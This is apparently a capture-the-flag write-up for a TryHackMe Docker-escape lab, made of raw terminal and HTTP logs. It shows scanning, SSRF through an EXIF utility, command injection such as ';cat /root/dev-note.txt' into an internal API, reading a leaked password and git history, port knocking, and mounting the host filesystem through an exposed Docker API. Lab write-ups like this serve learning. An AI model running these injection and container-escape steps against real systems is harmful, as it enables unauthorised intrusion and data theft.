alpine                                        3.9       78a2ce922f86   2 years ago   5.55MB

┌──(witty㉿kali)-[~/Downloads]
└─$ docker -H 10.10.85.253:2375 exec -it cb83912607b9 /bin/bash
bash-4.4$ whoami
quarkus
bash-4.4$ id
uid=1000(quarkus) gid=1000(quarkus) groups=1000(quarkus)
bash-4.4$ ls
application

┌──(witty㉿kali)-[~/Downloads]
└─$ docker -H 10.10.85.253:2375 exec -it 49fe455a9681 /bin/bash
root@docker-escape:/# id
uid=0(root) gid=0(root) groups=0(root)
root@docker-escape:/# ls
bin   dev		   docker-entrypoint.sh  home  lib64  mnt  proc  run   srv  tmp  var
boot  docker-entrypoint.d  etc			 lib   media  opt  root  sbin  sys  usr
root@docker-escape:/# cd root
root@docker-escape:~# ls
root@docker-escape:~# ls -lah
total 16K
drwx------ 2 root root 4.0K Dec  9  2020 .
drwxr-xr-x 1 root root 4.0K Jan  7  2021 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
root@docker-escape:~# cd ..
root@docker-escape:/# ls
bin   dev		   docker-entrypoint.sh  home  lib64  mnt  proc  run   srv  tmp  var
boot  docker-entrypoint.d  etc			 lib   media  opt  root  sbin  sys  usr
root@docker-escape:/# cd mnt
root@docker-escape:/mnt# ls
root@docker-escape:/mnt# exit
exit
                                                                                                 
┌──(witty㉿kali)-[~/Downloads]
└─$ docker -H 10.10.85.253:2375 exec -it 49fe455a9681 /bin/bash
root@docker-escape:/# find / -type f -name flag.txt 2>/dev/null
root@docker-escape:/# ^C
root@docker-escape:/# exit

┌──(witty㉿kali)-[~/Downloads]
└─$ docker -H 10.10.85.253:2375 run -it -v /:/mnt/ 78a2ce922f86 /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # ls -lah /
total 64
drwxr-xr-x    1 root     root        4.0K Apr  7 20:54 .
drwxr-xr-x    1 root     root        4.0K Apr  7 20:54 ..
-rwxr-xr-x    1 root     root           0 Apr  7 20:54 .dockerenv
drwxr-xr-x    2 root     root        4.0K Apr 23  2020 bin
drwxr-xr-x    5 root     root         360 Apr  7 20:54 dev
drwxr-xr-x    1 root     root        4.0K Apr  7 20:54 etc
drwxr-xr-x    2 root     root        4.0K Apr 23  2020 home
drwxr-xr-x    5 root     root        4.0K Apr 23  2020 lib
drwxr-xr-x    5 root     root        4.0K Apr 23  2020 media
drwxr-xr-x   22 root     root        4.0K Jan  9  2021 mnt
drwxr-xr-x    2 root     root        4.0K Apr 23  2020 opt
dr-xr-xr-x   96 root     root           0 Apr  7 20:54 proc
drwx------    1 root     root        4.0K Apr  7 20:54 root
drwxr-xr-x    2 root     root        4.0K Apr 23  2020 run
drwxr-xr-x    2 root     root        4.0K Apr 23  2020 sbin
drwxr-xr-x    2 root     root        4.0K Apr 23  2020 srv
dr-xr-xr-x   13 root     root           0 Apr  7 20:54 sys
drwxrwxrwt    2 root     root        4.0K Apr 23  2020 tmp
drwxr-xr-x    7 root     root        4.0K Apr 23  2020 usr
drwxr-xr-x   11 root     root        4.0K Apr 23  2020 var
/ # cd /mnt/root
/mnt/root # ls
flag.txt
/mnt/root # cat flag.txt
Congrats, you found the real flag!

THM{c62517c0cad93ac93a92b1315a32d734}
/mnt/root # cd /;cat .dockerenv
/

Find the real root flag

THM{c62517c0cad93ac93a92b1315a32d734}

[[Lookback]]

NextLookback

Last updated 2 years ago

Was this helpful?

┌──(witty㉿kali)-[~/Downloads] └─$ rustscan -a 10.10.141.57 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍 [~] The config file is expected to be at "/home/witty/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.141.57:22 Open 10.10.141.57:80 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 13:40 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 13:40 Completed NSE at 13:40, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 13:40 Completed NSE at 13:40, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 13:40 Completed NSE at 13:40, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 13:40 Completed Parallel DNS resolution of 1 host. at 13:40, 0.02s elapsed DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 13:40 Scanning 10.10.141.57 [2 ports] Discovered open port 80/tcp on 10.10.141.57 Discovered open port 22/tcp on 10.10.141.57 Completed Connect Scan at 13:40, 0.20s elapsed (2 total ports) Initiating Service scan at 13:40 Scanning 2 services on 10.10.141.57 Completed Service scan at 13:43, 162.02s elapsed (2 services on 1 host) NSE: Script scanning 10.10.141.57. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 13:43 Completed NSE at 13:43, 26.01s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 13:43 Completed NSE at 13:43, 2.98s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 13:43 Completed NSE at 13:43, 0.00s elapsed Nmap scan report for 10.10.141.57 Host is up, received user-set (0.20s latency). Scanned at 2023-04-07 13:40:17 EDT for 192s PORT STATE SERVICE REASON VERSION 22/tcp open ssh? syn-ack |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 80/tcp open http syn-ack nginx 1.19.6 |_http-title: docker-escape-nuxt | http-methods: |_ Supported Methods: GET HEAD |_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E | http-robots.txt: 3 disallowed entries |_/api/ /exif-util /*.bak.txt$ |_http-server-header: nginx/1.19.6 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port22-TCP:V=7.93%I=7%D=4/7%Time=6430558D%P=x86_64-pc-linux-gnu%r(Gener SF:icLines,4,"IR\r\n"); NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 13:43 Completed NSE at 13:43, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 13:43 Completed NSE at 13:43, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 13:43 Completed NSE at 13:43, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 192.99 seconds ┌──(witty㉿kali)-[/tmp] └─$ feroxbuster -u http://10.10.141.57/api/ -w /usr/share/wordlists/dirb/common.txt -k -t 64 -x php -s 200 ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.7.3 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://10.10.141.57/api/ 🚀 Threads │ 64 📖 Wordlist │ /usr/share/wordlists/dirb/common.txt 👌 Status Codes │ [200] 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.7.3 💉 Config File │ /etc/feroxbuster/ferox-config.toml 💲 Extensions │ [php] 🏁 HTTP methods │ [GET] 🔓 Insecure │ true 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── [####################] - 30s 9228/9228 0s found:0 errors:0 http://10.10.141.57/.well-known/security.txt Hey you found me! The security.txt file is made to help security researchers and ethical hackers to contact the company about security issues. See https://securitytxt.org/ for more information. Ping /api/fl46 with a HEAD request for a nifty treat. ┌──(witty㉿kali)-[/tmp] └─$ curl -I http://10.10.141.57/api/fl46 HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Fri, 07 Apr 2023 18:18:01 GMT Connection: keep-alive flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4} The "curl -I" command is used to send a HEAD request to a web server and retrieve only the headers of the HTTP response, without the body. This can be useful for checking the response headers, such as the status code, content type, and caching information, without downloading the entire response. HEAD /api/fl46 HTTP/1.1 HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Fri, 07 Apr 2023 18:20:54 GMT Connection: close flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4}

http://10.10.141.57/exif-util/ uploading an img EXIF: ---------------------- [JPEG] Compression Type - Baseline [JPEG] Data Precision - 8 bits [JPEG] Image Height - 533 pixels [JPEG] Image Width - 800 pixels [JPEG] Number of Components - 3 [JPEG] Component 1 - Y component: Quantization table 0, Sampling factors 2 horiz/2 vert [JPEG] Component 2 - Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert [JPEG] Component 3 - Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert [JFIF] Version - 1.1 [JFIF] Resolution Units - none [JFIF] X Resolution - 1 dot [JFIF] Y Resolution - 1 dot [JFIF] Thumbnail Width Pixels - 0 [JFIF] Thumbnail Height Pixels - 0 [ICC Profile] Profile Size - 524 [ICC Profile] CMM Type - lcms [ICC Profile] Version - 2.1.0 [ICC Profile] Class - Display Device [ICC Profile] Color space - RGB [ICC Profile] Profile Connection Space - XYZ [ICC Profile] Profile Date/Time - 2012:01:25 03:41:57 [ICC Profile] Signature - acsp [ICC Profile] Primary Platform - Apple Computer, Inc. [ICC Profile] XYZ values - 0.964 1 0.825 [ICC Profile] Tag Count - 10 [ICC Profile] Profile Description - c2 [ICC Profile] Profile Copyright - FB [ICC Profile] Media White Point - (0.9642, 1, 0.8249) [ICC Profile] Media Black Point - (0.0121, 0.0125, 0.0103) [ICC Profile] Red Colorant - (0.4361, 0.2225, 0.0139) [ICC Profile] Green Colorant - (0.3851, 0.7169, 0.0971) [ICC Profile] Blue Colorant - (0.1431, 0.0606, 0.7141) [ICC Profile] Red TRC - 0.0, 0.0030976, 0.0069734, 0.0132296, 0.0217594, 0.0328832, 0.0467231, 0.0634623, 0.0832685, 0.1062638, 0.1325856, 0.162356, 0.1956817, 0.2327001, 0.273518, 0.3182269, 0.3669032, 0.4196841, 0.4766461, 0.5378653, 0.6034638, 0.6734874, 0.7480125, 0.8272068, 0.9109026, 1.0 [ICC Profile] Green TRC - 0.0, 0.0030976, 0.0069734, 0.0132296, 0.0217594, 0.0328832, 0.0467231, 0.0634623, 0.0832685, 0.1062638, 0.1325856, 0.162356, 0.1956817, 0.2327001, 0.273518, 0.3182269, 0.3669032, 0.4196841, 0.4766461, 0.5378653, 0.6034638, 0.6734874, 0.7480125, 0.8272068, 0.9109026, 1.0 [ICC Profile] Blue TRC - 0.0, 0.0030976, 0.0069734, 0.0132296, 0.0217594, 0.0328832, 0.0467231, 0.0634623, 0.0832685, 0.1062638, 0.1325856, 0.162356, 0.1956817, 0.2327001, 0.273518, 0.3182269, 0.3669032, 0.4196841, 0.4766461, 0.5378653, 0.6034638, 0.6734874, 0.7480125, 0.8272068, 0.9109026, 1.0 [Huffman] Number of Tables - 4 Huffman tables [File Type] Detected File Type Name - JPEG [File Type] Detected File Type Long Name - Joint Photographic Experts Group [File Type] Detected MIME Type - image/jpeg [File Type] Expected File Name Extension - jpg [File] File Name - pfx4603328967788719562sfx [File] File Size - 42663 bytes [File] File Modified Date - Fri Apr 07 18:28:02 +00:00 2023 XMP: ---------------------- using url ┌──(witty㉿kali)-[~/Downloads] └─$ file filekoth filekoth: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1350x900, components 3 ┌──(witty㉿kali)-[~/Downloads] └─$ python3 -m http.server 1234 Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ... 10.10.141.57 - - [07/Apr/2023 14:31:13] "GET /filekoth HTTP/1.1" 200 - http://10.8.19.103:1234/filekoth EXIF: ---------------------- [JPEG] Compression Type - Baseline [JPEG] Data Precision - 8 bits [JPEG] Image Height - 900 pixels [JPEG] Image Width - 1350 pixels [JPEG] Number of Components - 3 [JPEG] Component 1 - Y component: Quantization table 0, Sampling factors 2 horiz/2 vert [JPEG] Component 2 - Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert [JPEG] Component 3 - Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert [JFIF] Version - 1.1 [JFIF] Resolution Units - inch [JFIF] X Resolution - 72 dots [JFIF] Y Resolution - 72 dots [JFIF] Thumbnail Width Pixels - 0 [JFIF] Thumbnail Height Pixels - 0 [Huffman] Number of Tables - 4 Huffman tables [File Type] Detected File Type Name - JPEG [File Type] Detected File Type Long Name - Joint Photographic Experts Group [File Type] Detected MIME Type - image/jpeg [File Type] Expected File Name Extension - jpg XMP: ---------------------- GET /api/exif?url=http:%2F%2F10.8.19.103:1234%2Ffilekoth HTTP/1.1 SSRF HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Fri, 07 Apr 2023 18:31:15 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 925 Connection: close EXIF: ---------------------- [JPEG] Compression Type - Baseline [JPEG] Data Precision - 8 bits [JPEG] Image Height - 900 pixels [JPEG] Image Width - 1350 pixels [JPEG] Number of Components - 3 [JPEG] Component 1 - Y component: Quantization table 0, Sampling factors 2 horiz/2 vert [JPEG] Component 2 - Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert [JPEG] Component 3 - Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert [JFIF] Version - 1.1 [JFIF] Resolution Units - inch [JFIF] X Resolution - 72 dots [JFIF] Y Resolution - 72 dots [JFIF] Thumbnail Width Pixels - 0 [JFIF] Thumbnail Height Pixels - 0 [Huffman] Number of Tables - 4 Huffman tables [File Type] Detected File Type Name - JPEG [File Type] Detected File Type Long Name - Joint Photographic Experts Group [File Type] Detected MIME Type - image/jpeg [File Type] Expected File Name Extension - jpg XMP: ---------------------- send to repeater GET /api/exif?url=http://127.0.0.1:8080 HTTP/1.1 HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Fri, 07 Apr 2023 18:39:24 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 342 Connection: close An error occurred: File format could not be determined Retrieved Content ---------------------------------------- <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Nothing to see here</title> </head> <body> <p>Nothing to see here, move along...</p> </body> </html> trying with port 22,80 and 8080 creating a wordlist to get /*.bak.txt$ ┌──(witty㉿kali)-[~/Downloads] └─$ cewl http://10.10.85.253 -d 5 -o CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/) docker escape nuxt Loading uhmm manually ┌──(witty㉿kali)-[/tmp] └─$ nano wordlist-man ┌──(witty㉿kali)-[/tmp] └─$ cat wordlist-man login users user photo image sign-up signup Signup SignUp test courses username user admin photos images exif-util classroom class course photos ┌──(witty㉿kali)-[/tmp] └─$ wfuzz -u http://10.10.85.253/FUZZ.bak.txt -w /tmp/wordlist-man --hc 404,503 --hh 3834 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.85.253/FUZZ.bak.txt Total requests: 21 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000017: 200 64 L 125 W 1479 Ch "exif-util" Total time: 9.437551 Processed Requests: 21 Filtered Requests: 20 Requests/sec.: 2.225153 http://10.10.85.253/exif-util.bak.txt <template> <section> <div class="container"> <h1 class="title">Exif Utils</h1> <section> <form @submit.prevent="submitUrl" name="submitUrl"> <b-field grouped label="Enter a URL to an image"> <b-input placeholder="http://..." expanded v-model="url" ></b-input> <b-button native-type="submit" type="is-dark"> Submit </b-button> </b-field> </form> </section> <section v-if="hasResponse"> <pre> {{ response }} </pre> </section> </div> </section> </template> <script> export default { name: 'Exif Util', auth: false, data() { return { hasResponse: false, response: '', url: '', } }, methods: { async submitUrl() { this.hasResponse = false console.log('Submitted URL') try { const response = await this.$axios.$get('http://api-dev-backup:8080/exif', { params: { url: this.url, }, }) this.hasResponse = true this.response = response } catch (err) { console.log(err) this.$buefy.notification.open({ duration: 4000, message: 'Something bad happened, please verify that the URL is valid', type: 'is-danger', position: 'is-top', hasIcon: true, }) } }, }, } </script> GET /api/exif?url=http://api-dev-backup:8080/exif HTTP/1.1 Server: nginx/1.19.6 Date: Fri, 07 Apr 2023 20:04:19 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 3287 Connection: close An error occurred: HTTP Exception 500 Internal Server Error Response was: --------------------------------------- <-- 500 http://api-dev-backup:8080/exif Response : Internal Server Error GET /api/exif?url=http://api-dev-backup:8080/exif?url=;whoami HTTP/1.1 HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Fri, 07 Apr 2023 20:06:26 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 414 Connection: close An error occurred: File format could not be determined Retrieved Content ---------------------------------------- An error occurred: File format could not be determined Retrieved Content ---------------------------------------- curl: no URL specified! curl: try 'curl --help' or 'curl --manual' for more information root GET /api/exif?url=http://api-dev-backup:8080/exif?url=;id HTTP/1.1 uid=0(root) gid=0(root) groups=0(root) cannot get a revshell doing manually GET /api/exif?url=http://api-dev-backup:8080/exif?url=;ls+-lah+/root HTTP/1.1 total 28K drwx------ 1 root root 4.0K Jan 7 2021 . drwxr-xr-x 1 root root 4.0K Jan 7 2021 .. lrwxrwxrwx 1 root root 9 Jan 6 2021 .bash_history -> /dev/null -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc drwxr-xr-x 1 root root 4.0K Jan 7 2021 .git -rw-r--r-- 1 root root 53 Jan 6 2021 .gitconfig -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-rw-r-- 1 root root 201 Jan 7 2021 dev-note.txt GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cat+/root/dev-note.txt HTTP/1.1 Hey guys, Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff. Anyways, the password is fluffybunnies123 Cheers, Hydra ┌──(witty㉿kali)-[~/Downloads] └─$ ssh hydra@10.10.85.253 -v OpenSSH_9.2p1 Debian-2, OpenSSL 3.0.8 7 Feb 2023 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files debug1: /etc/ssh/ssh_config line 21: Applying options for * debug1: Connecting to 10.10.85.253 [10.10.85.253] port 22. debug1: Connection established. debug1: identity file /home/witty/.ssh/id_rsa type 0 debug1: identity file /home/witty/.ssh/id_rsa-cert type -1 debug1: identity file /home/witty/.ssh/id_ecdsa type -1 debug1: identity file /home/witty/.ssh/id_ecdsa-cert type -1 debug1: identity file /home/witty/.ssh/id_ecdsa_sk type -1 debug1: identity file /home/witty/.ssh/id_ecdsa_sk-cert type -1 debug1: identity file /home/witty/.ssh/id_ed25519 type -1 debug1: identity file /home/witty/.ssh/id_ed25519-cert type -1 debug1: identity file /home/witty/.ssh/id_ed25519_sk type -1 debug1: identity file /home/witty/.ssh/id_ed25519_sk-cert type -1 debug1: identity file /home/witty/.ssh/id_xmss type -1 debug1: identity file /home/witty/.ssh/id_xmss-cert type -1 debug1: identity file /home/witty/.ssh/id_dsa type -1 debug1: identity file /home/witty/.ssh/id_dsa-cert type -1 debug1: Local version string SSH-2.0-OpenSSH_9.2p1 Debian-2 debug1: kex_exchange_identification: banner line 0: heQiE7 ]:{F debug1: kex_exchange_identification: banner line 1: { uhmm https://github.com/skeeto/endlessh ┌──(witty㉿kali)-[~/Downloads] └─$ curl -v http://10.10.85.253/api/login -d '{"username"\:"hydra","password"\:"fluffybunnies123"}' * Trying 10.10.85.253:80... * Connected to 10.10.85.253 (10.10.85.253) port 80 (#0) > POST /api/login HTTP/1.1 > Host: 10.10.85.253 > User-Agent: curl/7.87.0 > Accept: */* > Content-Length: 52 > Content-Type: application/x-www-form-urlencoded > * Mark bundle as not supporting multiuse < HTTP/1.1 415 Unsupported Media Type < Server: nginx/1.19.6 < Date: Fri, 07 Apr 2023 20:18:26 GMT < Content-Length: 0 < Connection: keep-alive < * Connection #0 to host 10.10.85.253 left intact ┌──(witty㉿kali)-[~/Downloads] └─$ curl -v http://10.10.85.253/api/login -d '{"username"\:"hydra","password"\:"fluffybunnies123"}' -H "Content-Type: application/json" * Trying 10.10.85.253:80... * Connected to 10.10.85.253 (10.10.85.253) port 80 (#0) > POST /api/login HTTP/1.1 > Host: 10.10.85.253 > User-Agent: curl/7.87.0 > Accept: */* > Content-Type: application/json > Content-Length: 52 > * Mark bundle as not supporting multiuse < HTTP/1.1 401 Unauthorized < Server: nginx/1.19.6 < Date: Fri, 07 Apr 2023 20:18:57 GMT < Content-Type: application/json < Content-Length: 72 < Connection: keep-alive < { "status": "ERROR", "message": "Invalid Username or Password" * Connection #0 to host 10.10.85.253 left intact } GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+log HTTP/1.1 commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a Author: Hydra <hydragyrum@example.com> Date: Thu Jan 7 16:48:58 2021 +0000 fixed the dev note commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539 Author: Hydra <hydragyrum@example.com> Date: Wed Jan 6 20:51:39 2021 +0000 Removed the flag and original dev note b/c Security commit a3d30a7d0510dc6565ff9316e3fb84434916dee8 Author: Hydra <hydragyrum@example.com> Date: Wed Jan 6 20:51:39 2021 +0000 Added the flag and dev notes GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+checkout+5242825dfd6b96819f65d17a1c31a99fea4ffb6a HTTP/1.1 Note: checking out '5242825dfd6b96819f65d17a1c31a99fea4ffb6a'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b <new-branch-name> HEAD is now at 5242825 fixed the dev note GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+checkout+4530ff7f56b215fa9fe76c4d7cc1319960c4e539 HTTP/1.1 Previous HEAD position was 5242825 fixed the dev note HEAD is now at 4530ff7 Removed the flag and original dev note b/c Security GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+checkout+a3d30a7d0510dc6565ff9316e3fb84434916dee8 HTTP/1.1 Previous HEAD position was 4530ff7 Removed the flag and original dev note b/c Security HEAD is now at a3d30a7 Added the flag and dev notes GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cat+/root/flag.txt HTTP/1.1 THM{0cb4b947043cb5c0486a454b75a10876} GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cat+/root/dev-note.txt HTTP/1.1 Hey guys, I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin. Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port. Cheers, Hydra

┌──(witty㉿kali)-[~/Downloads] └─$ cat knock_port.sh #! /bin/bash curl http://10.10.85.253:42 -m 1 sleep 1 curl http://10.10.85.253:1337 -m 1 sleep 1 curl http://10.10.85.253:10420 -m 1 sleep 1 curl http://10.10.85.253:6969 -m 1 sleep 1 curl http://10.10.85.253:63000 -m 1 ┌──(witty㉿kali)-[~/Downloads] └─$ man curl | grep '\--max-time' See also -m, --max-time. See also -m, --max-time and --connect-timeout. Added in 7.59.0. See also --no-keepalive and -m, --max-time. -m, --max-time <fractional seconds> If -m, --max-time is provided several times, the last set value will be used. curl --max-time 10 https://example.com curl --max-time 2.92 https://example.com single request's maximum time, use -m, --max-time. Set this option to zero to See also -y, --speed-time, --limit-rate and -m, --max-time. ┌──(witty㉿kali)-[~/Downloads] └─$ bash knock_port.sh curl: (7) Failed to connect to 10.10.85.253 port 42 after 197 ms: Couldn't connect to server curl: (7) Failed to connect to 10.10.85.253 port 1337 after 197 ms: Couldn't connect to server curl: (7) Failed to connect to 10.10.85.253 port 10420 after 203 ms: Couldn't connect to server curl: (7) Failed to connect to 10.10.85.253 port 6969 after 200 ms: Couldn't connect to server curl: (7) Failed to connect to 10.10.85.253 port 63000 after 219 ms: Couldn't connect to server ┌──(witty㉿kali)-[~/Downloads] └─$ rustscan -a 10.10.85.253 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍 [~] The config file is expected to be at "/home/witty/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.85.253:22 Open 10.10.85.253:80 Open 10.10.85.253:2375 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 16:34 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 16:34 Completed NSE at 16:34, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 16:34 Completed NSE at 16:34, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 16:34 Completed NSE at 16:34, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 16:34 Completed Parallel DNS resolution of 1 host. at 16:34, 0.01s elapsed DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 16:34 Scanning 10.10.85.253 [3 ports] Discovered open port 80/tcp on 10.10.85.253 Discovered open port 22/tcp on 10.10.85.253 Discovered open port 2375/tcp on 10.10.85.253 Completed Connect Scan at 16:34, 0.20s elapsed (3 total ports) Initiating Service scan at 16:34 Scanning 3 services on 10.10.85.253 Completed Service scan at 16:37, 162.04s elapsed (3 services on 1 host) NSE: Script scanning 10.10.85.253. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 16:37 Completed NSE at 16:37, 26.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 16:37 Completed NSE at 16:37, 3.01s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 16:37 Completed NSE at 16:37, 0.00s elapsed Nmap scan report for 10.10.85.253 Host is up, received user-set (0.19s latency). Scanned at 2023-04-07 16:34:27 EDT for 192s PORT STATE SERVICE REASON VERSION 22/tcp open ssh? syn-ack |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) | fingerprint-strings: | GenericLines: |_ M|[nPeZ'A 80/tcp open http syn-ack nginx 1.19.6 |_http-title: docker-escape-nuxt |_http-server-header: nginx/1.19.6 |_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E | http-robots.txt: 3 disallowed entries |_/api/ /exif-util /*.bak.txt$ | http-methods: |_ Supported Methods: GET HEAD 2375/tcp open docker syn-ack Docker 20.10.2 (API 1.41) | docker-version: | KernelVersion: 4.15.0-130-generic | ApiVersion: 1.41 | Version: 20.10.2 | MinAPIVersion: 1.12 | Platform: | Name: Docker Engine - Community | Os: linux | Arch: amd64 | Components: | | Details: | KernelVersion: 4.15.0-130-generic | Experimental: false | MinAPIVersion: 1.12 | GitCommit: 8891c58 | GoVersion: go1.13.15 | Arch: amd64 | Os: linux | BuildTime: 2020-12-28T16:15:09.000000000+00:00 | ApiVersion: 1.41 | Name: Engine | Version: 20.10.2 | | Details: | GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b | Name: containerd | Version: 1.4.3 | | Details: | GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff | Name: runc | Version: 1.0.0-rc92 | | Details: | GitCommit: de40ad0 | Name: docker-init | Version: 0.19.0 | GoVersion: go1.13.15 | BuildTime: 2020-12-28T16:15:09.000000000+00:00 |_ GitCommit: 8891c58 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port22-TCP:V=7.93%I=7%D=4/7%Time=64307E5F%P=x86_64-pc-linux-gnu%r(Gener SF:icLines,B,"M\|\[nPeZ'A\r\n"); Service Info: OS: linux NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 16:37 Completed NSE at 16:37, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 16:37 Completed NSE at 16:37, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 16:37 Completed NSE at 16:37, 0.00s elapsed Read data files from: 